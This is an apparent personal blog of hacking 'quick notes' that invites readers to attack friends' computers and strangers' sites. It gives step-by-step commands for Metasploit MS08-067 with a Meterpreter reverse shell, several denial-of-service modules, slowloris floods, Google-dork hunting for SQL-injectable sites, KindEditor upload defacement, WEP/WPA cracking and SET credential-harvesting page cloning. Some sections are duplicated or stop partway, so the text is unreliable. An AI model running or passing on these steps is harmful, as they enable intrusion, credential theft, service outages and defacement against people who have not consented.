Ettercap + SSLStrip

Wanna sniff some Facebook, Twitter or any kind of website under your network or poisoning your friend computer even that website using HTTPS for auth page? Well, ettercap and sslstrip are ready to help. 

ms08_067_netapi metasploit module - quick note

1. use windows/smb/ms08_067_netapi

2. set payload windows/meterpreter/reverse_tcp

3. show options

4. show target

5. set target 4

6. show target

7. set RHOST 192.168.169.145

8. set LHOST 192.168.169.132

9. show options

10. check

11. exploit

ms12_020_maxchannelids metasploit module - quick note

1. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

2. set RHOST 192.168.169.145

3. run

ms08_067_netapi metasploit module - quick note

1. use windows/smb/ms08_067_netapi

2. set payload windows/meterpreter/reverse_tcp

3. show options

4. show target

5. set target 4

6. show target

7. set RHOST 192.168.169.145

8. set LHOST 192.168.169.132

9. show options

10. meterpreter> run vnc  

and you will got your vnc…  ;)

SQL Injection using HVIJ

1. find your target using Google Dorks. Here's all the Google Dorks list,

http://pastebin.com/0FqmasC7

2. pick one of your prefer Google Dorks and start searching using all those query with, 'inurl:' at beginning of your queries.

ex,

inurl:read.php?id=

you can combine like this for looking specific domain,

inurl:prod_detail.php?id= site:.mn

SQL Injection using SQLMAP

1. still use Google dorks for finding the targets

http://pastebin.com/86tBDdxv

2. use Google dorks like this,

ex,

inurl:prod_detail.php?id=

you can combine like this for looking specific domain,

inurl:prod_detail.php?id= site:.mn

Web server DdoS with slowloris

1. download from http://ha.ckers.org/slowloris/

2. install perl-doc for reading slowloris manual

3. run slowloris,

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5

4. run slowloris for https,

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

Kindeditor XSS bugs

1. find your target using Google Dork,

inurl:examples/uploadbutton.html

you can combine like this for looking specific domain,

inurl:prod_detail.php?id= site:.mn

2. click the url victim

ex,

http://yourtarget.com/web/Public/kindeditor/examples/uploadbutton.html

3. click upload button, choose your html file as deface signature and copy the path and paste to url,

ex,

http://yourtarget.com/web/Public/kindeditor/attached/file/20130409/20130409130830_55310.html

and press enter

Hacking WPA/WPA2 without word dictionary

This method only work against WPA/WPA2 on WiFI with WPS enabled.

1. Install reaver,

apt-get install reaver

2. Install aircrack-ng

apt-get install aircrack-ng

3. Put your wireless card into monitoring mode,

airmon-ng start wlan0

Hacking WEP

1. make sure you're not connected to any wireless

ifconfig wlan0 down

2. start wifi monitoring mode. if success, you gonna have new wifi interface, mon0.

airmon-ng start wlan0

3. monitor all wifi around you. find any WEP near you. Once done, hit "ctrl+c" for stop.

airodump-ng mon0

Hacking WPA/WPA2

1. start airmon-ng

airmon-ng start wlan0

2. monitor the wifi and keep it running!

airodump-ng -c 3 -w capturefile --bbsid targetbssid --ivs mon0

ex,

airodump-ng -c -w mytarget --bssid 00:11:22:33:44:55 --ivs mon0

3. open new terminal.

aireplay-ng -0 1 -a targetbssid -c yourmacaddress mon0

ex,

aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0

wait for the handshake!

Social Engineering Attacks - Web Clone / Harvesting Credentials

1. run your backtrack

2. run set app

cd /pentest/exploits/set

./set

3. choice "Social-Engineering Attacks"

4. choice "Website Attack Vectors"

5. choice "Tabnabbing Attack Method"

6. choice "Site Cloner"

MS10-054 - Vulnerabilities in SMB Could Allow Remote Code Execution

Bugs : MS10-054 - Vulnerabilities in SMB Could Allow Remote Code Execution

OS : Windows XP SP 0/1

Level : Critical

Metasploit module : auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow

Use : 

1. use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow
2. set RHOST target_ip
3. set SMBSHARE target_share_folder_name
4. run

Output : 

[*] Sending malformed trans2 request..

[*] The target should encounter a blue screen error now.

[*] Auxiliary module execution completed

Cause : BSOD on target machine

FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service

Bugs : FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service

OS : -

Level : Medium

Metasploit module : auxiliary/dos/windows/ftp/filezilla_server_port

Use : 

1. use auxiliary/dos/windows/ftp/filezilla_server_port
2. set RHOST target_ip
3. run

Output : 

[*] Auxiliary module execution completed

Cause : FileZilla server will closed